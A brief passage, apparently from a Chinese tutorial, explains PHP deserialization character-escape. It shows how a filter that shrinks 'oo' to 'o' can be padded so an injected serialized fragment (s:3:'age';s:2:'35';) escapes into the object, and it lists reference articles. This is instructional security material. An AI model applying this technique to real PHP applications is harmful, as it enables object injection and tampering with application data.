选中部分就是我们构造出来，他需要吞噬的代码s:22:""这个双引号里面我们还有操作的空间，用来补齐字符串长度，接着就是计算我们自己所需要吃掉的字符串长度为18，根据过滤，他是将两个o变成一个，也就是每吃掉一个字符，就需要有一个oo，那我们需要吃掉的是18个长度，那么我们就需要18个oo，在吞噬结束之后我们的格式又恢复正确，使得真正的字符s:3:"age";s:2:"35";逃逸出来

参考文章

细说php反序列化字符逃逸

session反序列化漏洞